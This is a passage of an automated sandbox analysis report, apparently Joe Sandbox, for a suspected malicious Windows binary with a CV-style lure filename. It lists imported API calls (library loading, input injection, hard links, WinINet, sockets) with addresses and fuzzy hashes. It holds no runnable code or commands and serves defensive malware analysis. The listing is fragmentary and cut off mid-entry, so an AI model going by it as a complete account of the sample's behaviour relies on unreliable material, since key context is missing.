                                                                                        • Instruction Fuzzy Hash: 73110A71200258BEEF215F66CC46FEB376DEF89754F024228FA45A61E1D6B2F811CB24
                                                                                        APIs
                                                                                        • LoadLibraryExW.KERNEL32(combase.dll,00000000,00000800,RoInitialize,003A2350,?), ref: 003A22A1
                                                                                        • GetProcAddress.KERNEL32(00000000), ref: 003A22A8
                                                                                        Strings
                                                                                        Similarity
                                                                                        • API ID: AddressLibraryLoadProc
                                                                                        • String ID: RoInitialize$combase.dll
                                                                                        • API String ID: 2574300362-340411864
                                                                                        • Opcode ID: 9bd7b0666b8a2142001367eef9e728555401fd95f40a9f549c7d06784562845d
                                                                                        • Instruction ID: 13eed7114acd1784a07ad0ec3d7f4b65f018f1535ee803ca7fb9386a7597d454
                                                                                        • Opcode Fuzzy Hash: 9bd7b0666b8a2142001367eef9e728555401fd95f40a9f549c7d06784562845d
                                                                                        • Instruction Fuzzy Hash: A7E04F74AA0300ABEB605FB4ED4DB153664F702706F104434F282E50E0CFBA4068CF0C
                                                                                        APIs
                                                                                        • LoadLibraryExW.KERNEL32(combase.dll,00000000,00000800,RoUninitialize,003A2276), ref: 003A2376
                                                                                        • GetProcAddress.KERNEL32(00000000), ref: 003A237D
                                                                                        Strings
                                                                                        Similarity
                                                                                        • API ID: AddressLibraryLoadProc
                                                                                        • String ID: RoUninitialize$combase.dll
                                                                                        • API String ID: 2574300362-2819208100
                                                                                        • Opcode ID: 7d63a58ef773a0482cb4ced2cd9272983ac1c30b10f4120b052cdfdb79d8cb4a
                                                                                        • Instruction ID: 8ce2f23b4c0b4b7d1c22f0fa5e650eab655f2878346935d5f2c2424a760ce690
                                                                                        • Opcode Fuzzy Hash: 7d63a58ef773a0482cb4ced2cd9272983ac1c30b10f4120b052cdfdb79d8cb4a
                                                                                        • Instruction Fuzzy Hash: D6E0EC78A84300AFDB25AFA1EE0EB053A75B716706F110434F249E20F0CBBA9428DB1C
                                                                                        APIs
                                                                                        Strings
                                                                                        Similarity
                                                                                        • API ID: LocalTime__swprintf
                                                                                        • String ID: %.3d$WIN_XPe
                                                                                        • API String ID: 2070861257-2409531811
                                                                                        • Opcode ID: b5a27356906c2607003593f586bbb53cbc1f7d614cab9a14dac81e3b86b18537
                                                                                        • Instruction ID: a394c2b73b960f50a19c6889997eeb631c25d4999743368eeb7700dd0d4a8e7c
                                                                                        • Opcode Fuzzy Hash: b5a27356906c2607003593f586bbb53cbc1f7d614cab9a14dac81e3b86b18537
                                                                                        • Instruction Fuzzy Hash: AFE012F1804A1CDBCB139790CE05DFAB3BCA708781F1000D2FA0AE1900D7359B88AA17
                                                                                        APIs
                                                                                        • LoadLibraryA.KERNEL32(kernel32.dll,?,003E21FB,?,003E23EF), ref: 003E2213
                                                                                        • GetProcAddress.KERNEL32(00000000,GetProcessId), ref: 003E2225
                                                                                        Similarity
                                                                                        • API ID: AddressLibraryLoadProc
                                                                                        • String ID: GetProcessId$kernel32.dll
                                                                                        • API String ID: 2574300362-399901964
                                                                                        • Opcode ID: 2653433d3836fccddafd7c2e06dc6fb470e584a4ad112211eefbe40f0ac7c634
                                                                                        • Instruction ID: 852fa592a79d3ce813a1123556fc3fc54dce255e5706f23ad8aa9bff31023b94
                                                                                        • Opcode Fuzzy Hash: 2653433d3836fccddafd7c2e06dc6fb470e584a4ad112211eefbe40f0ac7c634
                                                                                        • Instruction Fuzzy Hash: 08D0A735C007269FC7225F71F90974276D8EB0C305F11583AED51F2190DBB4D8848664
                                                                                        APIs
                                                                                        • LoadLibraryA.KERNEL32(kernel32.dll,00000000,003842EC,?,003842AA,?), ref: 00384304
                                                                                        • GetProcAddress.KERNEL32(00000000,Wow64RevertWow64FsRedirection), ref: 00384316
                                                                                        Similarity
                                                                                        • API ID: AddressLibraryLoadProc
                                                                                        • String ID: Wow64RevertWow64FsRedirection$kernel32.dll
                                                                                        • API String ID: 2574300362-1355242751
                                                                                        • Opcode ID: 8536b3447bfb09e181492b8da7299f432daaca79d605e751cd23fa388a07f4cc
                                                                                        • Instruction ID: effa76e2ec87f8be4353db33afed92bc74ca3854c47bbfe3bcc6c4ddd750c24b
                                                                                        • Opcode Fuzzy Hash: 8536b3447bfb09e181492b8da7299f432daaca79d605e751cd23fa388a07f4cc
                                                                                        • Instruction Fuzzy Hash: 51D0A7748007139FC7216F60E80D70176D4AF08302F11447AF841E2564DBF4C8848754
                                                                                        APIs
                                                                                        • LoadLibraryA.KERNEL32(kernel32.dll,003841BB,00384341,?,0038422F,?,003841BB,?,?,?,?,003839FE,?,00000001), ref: 00384359
                                                                                        • GetProcAddress.KERNEL32(00000000,Wow64DisableWow64FsRedirection), ref: 0038436B
                                                                                        Similarity
                                                                                        • API ID: AddressLibraryLoadProc
                                                                                        • String ID: Wow64DisableWow64FsRedirection$kernel32.dll
                                                                                        • API String ID: 2574300362-3689287502
                                                                                        • Opcode ID: c3166e95979471430901b13fe50e6645d6d7e8c1463ce92bfca4a26d0f8c00c3
                                                                                        • Instruction ID: 0c2ec037e89c4d355bb066c7d5e8f9f1d44cc9cd8fe96f8f90c0c32cfaec0ab1
                                                                                        • Opcode Fuzzy Hash: c3166e95979471430901b13fe50e6645d6d7e8c1463ce92bfca4a26d0f8c00c3
                                                                                        • Instruction Fuzzy Hash: A5D0A7748007139FC7216FB0E90970176D4AF18716F21447AE881E2550DBF4D8848B54
                                                                                        APIs
                                                                                        • LoadLibraryA.KERNEL32(oleaut32.dll,?,003C051D,?,003C05FE), ref: 003C0547
                                                                                        • GetProcAddress.KERNEL32(00000000,RegisterTypeLibForUser), ref: 003C0559
                                                                                        Similarity
                                                                                        • API ID: AddressLibraryLoadProc
                                                                                        • String ID: RegisterTypeLibForUser$oleaut32.dll
                                                                                        • API String ID: 2574300362-1071820185
                                                                                        • Opcode ID: c038332d99ccc43a836966a1471d760987a2f2c00583d7453768d16a63d0138d
                                                                                        • Instruction ID: 71969576ba48527b45a11a3bb928da782ddf5739d4cb937e5555c19d1dba9c6d
                                                                                        • Opcode Fuzzy Hash: c038332d99ccc43a836966a1471d760987a2f2c00583d7453768d16a63d0138d
                                                                                        • Instruction Fuzzy Hash: D7D0A730808722DFC7208F60E908B45B6E4AB09301F21C43EE846E2254DAB4CC848B54
                                                                                        APIs
                                                                                        • LoadLibraryA.KERNEL32(oleaut32.dll,00000000,003C052F,?,003C06D7), ref: 003C0572
                                                                                        • GetProcAddress.KERNEL32(00000000,UnRegisterTypeLibForUser), ref: 003C0584
                                                                                        Similarity
                                                                                        • API ID: AddressLibraryLoadProc
                                                                                        • String ID: UnRegisterTypeLibForUser$oleaut32.dll
                                                                                        • API String ID: 2574300362-1587604923
                                                                                        • Opcode ID: 1d2cc34756ae61cc8f0b40b68aca4b5193210c2b39c871450ef74f9979d17219
                                                                                        • Instruction ID: ef072d938c2ec84088d5776005cb91cf99c2e9bf855f82b341162e08de84e678
                                                                                        • Opcode Fuzzy Hash: 1d2cc34756ae61cc8f0b40b68aca4b5193210c2b39c871450ef74f9979d17219
                                                                                        • Instruction Fuzzy Hash: BFD0A731848312DFCB205F74E948F02B7E4AB09300F21853EEC41E2154DBB4C8C48B64
                                                                                        APIs
                                                                                        • LoadLibraryA.KERNEL32(kernel32.dll,?,003DECBE,?,003DEBBB), ref: 003DECD6
                                                                                        • GetProcAddress.KERNEL32(00000000,GetSystemWow64DirectoryW), ref: 003DECE8
                                                                                        Similarity
                                                                                        • API ID: AddressLibraryLoadProc
                                                                                        • String ID: GetSystemWow64DirectoryW$kernel32.dll
                                                                                        • API String ID: 2574300362-1816364905
                                                                                        • Opcode ID: 3367daf319d3cb5a3eb5a17c14b0ae458045a3f56420953d076b01c07991d46d
                                                                                        • Instruction ID: f216f521ab5c7b9444e2730e867618d46023044cd81695636a2331b56f664f00
                                                                                        • Opcode Fuzzy Hash: 3367daf319d3cb5a3eb5a17c14b0ae458045a3f56420953d076b01c07991d46d
                                                                                        • Instruction Fuzzy Hash: B4D0A7318107239FCB216FA0F9497427AF4AB08300F11843BFC45E7254DFB4D8848654
                                                                                        APIs
                                                                                        • LoadLibraryA.KERNEL32(kernel32.dll,00000000,003DBAD3,00000001,003DB6EE,?,0041DC00), ref: 003DBAEB
                                                                                        • GetProcAddress.KERNEL32(00000000,GetModuleHandleExW), ref: 003DBAFD
                                                                                        Similarity
                                                                                        • API ID: AddressLibraryLoadProc
                                                                                        • String ID: GetModuleHandleExW$kernel32.dll
                                                                                        • API String ID: 2574300362-199464113
                                                                                        • Opcode ID: 8b1a3a84cd4136cc8ee158ff78fd5038814951b6a2d95bc7d1d5df58986abefe
                                                                                        • Instruction ID: 43eca529e0a35dbce7a4a07ba4f9cb919572875c8160695e8f8aebf0b768f50c
                                                                                        • Opcode Fuzzy Hash: 8b1a3a84cd4136cc8ee158ff78fd5038814951b6a2d95bc7d1d5df58986abefe
                                                                                        • Instruction Fuzzy Hash: 90D0A731D04712DFC7315F60F94AB55B6E4AB09300F12443BE843E2254DBB4D884C658
                                                                                        APIs
                                                                                        • LoadLibraryA.KERNEL32(advapi32.dll,?,003E3BD1,?,003E3E06), ref: 003E3BE9
                                                                                        • GetProcAddress.KERNEL32(00000000,RegDeleteKeyExW), ref: 003E3BFB
                                                                                        Similarity
                                                                                        • API ID: AddressLibraryLoadProc
                                                                                        • String ID: RegDeleteKeyExW$advapi32.dll
                                                                                        • API String ID: 2574300362-4033151799
                                                                                        • Opcode ID: b8f390992bc7161d372f0eb879f36682b887d6073f47c47fe5909091763adac5
                                                                                        • Instruction ID: 60d9223d5d5378114945c98169255ba06620421a6f57f4ed1dd90c5fe78a0c48
                                                                                        • Opcode Fuzzy Hash: b8f390992bc7161d372f0eb879f36682b887d6073f47c47fe5909091763adac5
                                                                                        • Instruction Fuzzy Hash: CED0A7B08007629FC7205FE5E90D783BAF4AB09324F31443AE845F3190DAB8D8848E54
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: a75baaae645a5cd7dfcd8bd319b3733085cf72e82ea25c139675e6c37f196974
                                                                                        • Instruction ID: fb1c17083c26c3bbf1b2f9a36a94ac90299554bb9a33e2a74745704a39f991be
                                                                                        • Opcode Fuzzy Hash: a75baaae645a5cd7dfcd8bd319b3733085cf72e82ea25c139675e6c37f196974
                                                                                        • Instruction Fuzzy Hash: 04C16C75A0021AEFCB15CF94C884BEEBBB5FF48708F118599EA05AB651D730DE41DB90
                                                                                        APIs
                                                                                        • CoInitialize.OLE32(00000000), ref: 003DAAB4
                                                                                        • CoUninitialize.OLE32 ref: 003DAABF
                                                                                          • Part of subcall function 003C0213: CoCreateInstance.OLE32(?,00000000,00000005,?,?,?,?,?,?,?,?,?,?,?), ref: 003C027B
                                                                                        • VariantInit.OLEAUT32(?), ref: 003DAACA
                                                                                        • VariantClear.OLEAUT32(?), ref: 003DAD9D
                                                                                        Similarity
                                                                                        • API ID: Variant$ClearCreateInitInitializeInstanceUninitialize
                                                                                        • String ID:
                                                                                        • API String ID: 780911581-0
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1706915956.0000000000381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1706900576.0000000000380000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1706959442.000000000040D000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1706959442.000000000042E000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1706996719.000000000043A000.00000004.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1707012653.0000000000444000.00000002.00000001.01000000.00000003.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_380000_CV Lic H&S Olivetti Renzo.jbxd
                                                                                        Similarity
                                                                                        • API ID: Variant$AllocClearCopyInitString
                                                                                        • String ID:
                                                                                        • API String ID: 2808897238-0
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1706915956.0000000000381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1706900576.0000000000380000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1706959442.000000000040D000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1706959442.000000000042E000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1706996719.000000000043A000.00000004.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1707012653.0000000000444000.00000002.00000001.01000000.00000003.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_380000_CV Lic H&S Olivetti Renzo.jbxd
                                                                                        Similarity
                                                                                        • API ID: _memset$__filbuf__getptd_noexit_memcpy_s
                                                                                        • String ID:
                                                                                        • API String ID: 3877424927-0
                                                                                        APIs
                                                                                        • GetWindowRect.USER32(01866F40,?), ref: 003EC544
                                                                                        • ScreenToClient.USER32(?,00000002), ref: 003EC574
                                                                                        • MoveWindow.USER32(00000002,?,?,?,000000FF,00000001,?,00000002,?,?,?,00000002,?,?), ref: 003EC5DA
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1706915956.0000000000381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1706900576.0000000000380000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1706959442.000000000040D000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1706959442.000000000042E000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1706996719.000000000043A000.00000004.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1707012653.0000000000444000.00000002.00000001.01000000.00000003.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_380000_CV Lic H&S Olivetti Renzo.jbxd
                                                                                        Similarity
                                                                                        • API ID: Window$ClientMoveRectScreen
                                                                                        • String ID:
                                                                                        • API String ID: 3880355969-0
                                                                                        APIs
                                                                                        • SendMessageW.USER32(?,0000110A,00000004,00000000), ref: 003BC462
                                                                                        • __itow.LIBCMT ref: 003BC49C
                                                                                          • Part of subcall function 003BC6E8: SendMessageW.USER32(?,0000113E,00000000,00000000), ref: 003BC753
                                                                                        • SendMessageW.USER32(?,0000110A,00000001,?), ref: 003BC505
                                                                                        • __itow.LIBCMT ref: 003BC55A
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1706915956.0000000000381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1706900576.0000000000380000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1706959442.000000000040D000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1706959442.000000000042E000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1706996719.000000000043A000.00000004.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1707012653.0000000000444000.00000002.00000001.01000000.00000003.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_380000_CV Lic H&S Olivetti Renzo.jbxd
                                                                                        Similarity
                                                                                        • API ID: MessageSend$__itow
                                                                                        • String ID:
                                                                                        • API String ID: 3379773720-0
                                                                                        APIs
                                                                                        • GetKeyboardState.USER32(?,00000000,?,00000001), ref: 003C3966
                                                                                        • SetKeyboardState.USER32(00000080,?,00000001), ref: 003C3982
                                                                                        • PostMessageW.USER32(00000000,00000102,?,00000001), ref: 003C39EF
                                                                                        • SendInput.USER32(00000001,?,0000001C,00000000,?,00000001), ref: 003C3A4D
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1706915956.0000000000381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1706900576.0000000000380000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1706959442.000000000040D000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1706959442.000000000042E000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1706996719.000000000043A000.00000004.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1707012653.0000000000444000.00000002.00000001.01000000.00000003.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_380000_CV Lic H&S Olivetti Renzo.jbxd
                                                                                        Similarity
                                                                                        • API ID: KeyboardState$InputMessagePostSend
                                                                                        • String ID:
                                                                                        • API String ID: 432972143-0
                                                                                        APIs
                                                                                        • CreateHardLinkW.KERNEL32(00000002,?,00000000), ref: 003CE742
                                                                                        • GetLastError.KERNEL32(?,00000000), ref: 003CE768
                                                                                        • DeleteFileW.KERNEL32(00000002,?,00000000), ref: 003CE78D
                                                                                        • CreateHardLinkW.KERNEL32(00000002,?,00000000,?,00000000), ref: 003CE7B9
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1706915956.0000000000381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1706900576.0000000000380000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1706959442.000000000040D000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1706959442.000000000042E000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1706996719.000000000043A000.00000004.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1707012653.0000000000444000.00000002.00000001.01000000.00000003.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_380000_CV Lic H&S Olivetti Renzo.jbxd
                                                                                        Similarity
                                                                                        • API ID: CreateHardLink$DeleteErrorFileLast
                                                                                        • String ID:
                                                                                        • API String ID: 3321077145-0
                                                                                        APIs
                                                                                        • InvalidateRect.USER32(?,00000000,00000001,?,?,?), ref: 003EB5D1
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1706915956.0000000000381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1706900576.0000000000380000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1706959442.000000000040D000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1706959442.000000000042E000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1706996719.000000000043A000.00000004.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1707012653.0000000000444000.00000002.00000001.01000000.00000003.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_380000_CV Lic H&S Olivetti Renzo.jbxd
                                                                                        Similarity
                                                                                        • API ID: InvalidateRect
                                                                                        • String ID:
                                                                                        • API String ID: 634782764-0
                                                                                        APIs
                                                                                        • ClientToScreen.USER32(?,?), ref: 003ED807
                                                                                        • GetWindowRect.USER32(?,?), ref: 003ED87D
                                                                                        • PtInRect.USER32(?,?,003EED5A), ref: 003ED88D
                                                                                        • MessageBeep.USER32(00000000), ref: 003ED8FE
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1706915956.0000000000381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1706900576.0000000000380000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1706959442.000000000040D000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1706959442.000000000042E000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1706996719.000000000043A000.00000004.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1707012653.0000000000444000.00000002.00000001.01000000.00000003.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_380000_CV Lic H&S Olivetti Renzo.jbxd
                                                                                        Similarity
                                                                                        • API ID: Rect$BeepClientMessageScreenWindow
                                                                                        • String ID:
                                                                                        • API String ID: 1352109105-0
                                                                                        APIs
                                                                                        • GetKeyboardState.USER32(?,75C0C0D0,?,00008000), ref: 003C3AB8
                                                                                        • SetKeyboardState.USER32(00000080,?,00008000), ref: 003C3AD4
                                                                                        • PostMessageW.USER32(00000000,00000101,00000000,?), ref: 003C3B34
                                                                                        • SendInput.USER32(00000001,?,0000001C,75C0C0D0,?,00008000), ref: 003C3B92
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1706915956.0000000000381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1706900576.0000000000380000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1706959442.000000000040D000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1706959442.000000000042E000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1706996719.000000000043A000.00000004.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1707012653.0000000000444000.00000002.00000001.01000000.00000003.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_380000_CV Lic H&S Olivetti Renzo.jbxd
                                                                                        Similarity
                                                                                        • API ID: KeyboardState$InputMessagePostSend
                                                                                        • String ID:
                                                                                        • API String ID: 432972143-0
                                                                                        APIs
                                                                                        • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 003B4038
                                                                                        • __isleadbyte_l.LIBCMT ref: 003B4066
                                                                                        • MultiByteToWideChar.KERNEL32(00000080,00000009,00000002,00000001,?,00000000,?,00000000,?,?,?), ref: 003B4094
                                                                                        • MultiByteToWideChar.KERNEL32(00000080,00000009,00000002,00000001,?,00000000,?,00000000,?,?,?), ref: 003B40CA
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1706915956.0000000000381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1706900576.0000000000380000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1706959442.000000000040D000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1706959442.000000000042E000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1706996719.000000000043A000.00000004.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1707012653.0000000000444000.00000002.00000001.01000000.00000003.sdmp
                                                                                        Similarity
                                                                                        • API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
                                                                                        • String ID:
                                                                                        • API String ID: 3058430110-0
                                                                                        APIs
                                                                                        • GetForegroundWindow.USER32 ref: 003E7CB9
                                                                                          • Part of subcall function 003C5F55: GetWindowThreadProcessId.USER32(?,00000000), ref: 003C5F6F
                                                                                          • Part of subcall function 003C5F55: GetCurrentThreadId.KERNEL32 ref: 003C5F76
                                                                                          • Part of subcall function 003C5F55: AttachThreadInput.USER32(00000000,?,003C781F), ref: 003C5F7D
                                                                                        • GetCaretPos.USER32(?), ref: 003E7CCA
                                                                                        • ClientToScreen.USER32(00000000,?), ref: 003E7D03
                                                                                        • GetForegroundWindow.USER32 ref: 003E7D09
                                                                                        Similarity
                                                                                        • API ID: ThreadWindow$Foreground$AttachCaretClientCurrentInputProcessScreen
                                                                                        • String ID:
                                                                                        • API String ID: 2759813231-0
                                                                                        APIs
                                                                                          • Part of subcall function 0039B34E: GetWindowLongW.USER32(?,000000EB), ref: 0039B35F
                                                                                        • GetCursorPos.USER32(?), ref: 003EF211
                                                                                        • TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000,?,003FE4C0,?,?,?,?,?), ref: 003EF226
                                                                                        • GetCursorPos.USER32(?), ref: 003EF270
                                                                                        • DefDlgProcW.USER32(?,0000007B,?,?,?,?,?,?,?,?,?,?,003FE4C0,?,?,?), ref: 003EF2A6
                                                                                        Similarity
                                                                                        • API ID: Cursor$LongMenuPopupProcTrackWindow
                                                                                        • String ID:
                                                                                        • API String ID: 2864067406-0
                                                                                        APIs
                                                                                        • InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 003D4358
                                                                                          • Part of subcall function 003D43E2: InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 003D4401
                                                                                          • Part of subcall function 003D43E2: InternetCloseHandle.WININET(00000000), ref: 003D449E
                                                                                        Similarity
                                                                                        • API ID: Internet$CloseConnectHandleOpen
                                                                                        • String ID:
                                                                                        • API String ID: 1463438336-0
                                                                                        APIs
                                                                                        • GetWindowLongW.USER32(?,000000EC), ref: 003E8AA6
                                                                                        • SetWindowLongW.USER32(?,000000EC,00000000), ref: 003E8AC0
                                                                                        • SetWindowLongW.USER32(?,000000EC,00000000), ref: 003E8ACE
                                                                                        • SetLayeredWindowAttributes.USER32(?,00000000,?,00000002), ref: 003E8ADC
                                                                                        Similarity
                                                                                        • API ID: Window$Long$AttributesLayered
                                                                                        • String ID:
                                                                                        • API String ID: 2169480361-0
                                                                                        APIs
                                                                                        • select.WSOCK32(00000000,00000001,00000000,00000000,?), ref: 003D8AE0
                                                                                        • __WSAFDIsSet.WSOCK32(00000000,00000001), ref: 003D8AF2
                                                                                        • accept.WSOCK32(00000000,00000000,00000000), ref: 003D8AFF
                                                                                        • WSAGetLastError.WSOCK32(00000000), ref: 003D8B16
                                                                                        Similarity
                                                                                        • API ID: ErrorLastacceptselect
                                                                                        • String ID:
                                                                                        • API String ID: 385091864-0
                                                                                        APIs
                                                                                          • Part of subcall function 003C1E68: lstrlenW.KERNEL32(?,00000002,?,?,000000EF,?,003C0ABB,?,?,?,003C187A,00000000,000000EF,00000119,?,?), ref: 003C1E77
                                                                                          • Part of subcall function 003C1E68: lstrcpyW.KERNEL32(00000000,?,?,003C0ABB,?,?,?,003C187A,00000000,000000EF,00000119,?,?,00000000), ref: 003C1E9D
                                                                                          • Part of subcall function 003C1E68: lstrcmpiW.KERNEL32(00000000,?,003C0ABB,?,?,?,003C187A,00000000,000000EF,00000119,?,?), ref: 003C1ECE
                                                                                        • lstrlenW.KERNEL32(?,00000002,?,?,?,?,003C187A,00000000,000000EF,00000119,?,?,00000000), ref: 003C0AD4
                                                                                        • lstrcpyW.KERNEL32(00000000,?,?,003C187A,00000000,000000EF,00000119,?,?,00000000), ref: 003C0AFA
                                                                                        • lstrcmpiW.KERNEL32(00000002,cdecl,?,003C187A,00000000,000000EF,00000119,?,?,00000000), ref: 003C0B2E
                                                                                        Strings
                                                                                        Similarity
                                                                                        • API ID: lstrcmpilstrcpylstrlen
                                                                                        • String ID: cdecl
                                                                                        • API String ID: 4031866154-3896280584
                                                                                        APIs
                                                                                        • _free.LIBCMT ref: 003B2FB5
                                                                                          • Part of subcall function 003A395C: __FF_MSGBANNER.LIBCMT ref: 003A3973
                                                                                          • Part of subcall function 003A395C: __NMSG_WRITE.LIBCMT ref: 003A397A
                                                                                          • Part of subcall function 003A395C: RtlAllocateHeap.NTDLL(01840000,00000000,00000001,00000001,00000000,?,?,0039F507,?,0000000E), ref: 003A399F
                                                                                        Similarity
                                                                                        • API ID: AllocateHeap_free
                                                                                        • String ID:
                                                                                        • API String ID: 614378929-0
                                                                                        APIs
                                                                                        • GetModuleFileNameW.KERNEL32(?,?,00000104,00000000,00000000), ref: 003C05AC
                                                                                        • LoadTypeLibEx.OLEAUT32(?,00000002,?), ref: 003C05C7
                                                                                        • RegisterTypeLib.OLEAUT32(?,?,00000000), ref: 003C05DD
                                                                                        • FreeLibrary.KERNEL32(?), ref: 003C0632
                                                                                        Similarity
                                                                                        • API ID: Type$FileFreeLibraryLoadModuleNameRegister
                                                                                        • String ID:
                                                                                        • API String ID: 3137044355-0
                                                                                        APIs
                                                                                        • CreateFileW.KERNEL32(?,C0000000,00000003,00000000,00000003,00000080,00000000), ref: 003C6733
                                                                                        • _memset.LIBCMT ref: 003C6754
                                                                                        • DeviceIoControl.KERNEL32(00000000,0004D02C,?,00000200,?,00000200,?,00000000), ref: 003C67A6
                                                                                        • CloseHandle.KERNEL32(00000000), ref: 003C67AF
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1706915956.0000000000381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1706900576.0000000000380000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1706959442.000000000040D000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1706959442.000000000042E000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1706996719.000000000043A000.00000004.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1707012653.0000000000444000.00000002.00000001.01000000.00000003.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_380000_CV Lic H&S Olivetti Renzo.jbxd
                                                                                        Similarity
                                                                                        • API ID: CloseControlCreateDeviceFileHandle_memset
                                                                                        • String ID:
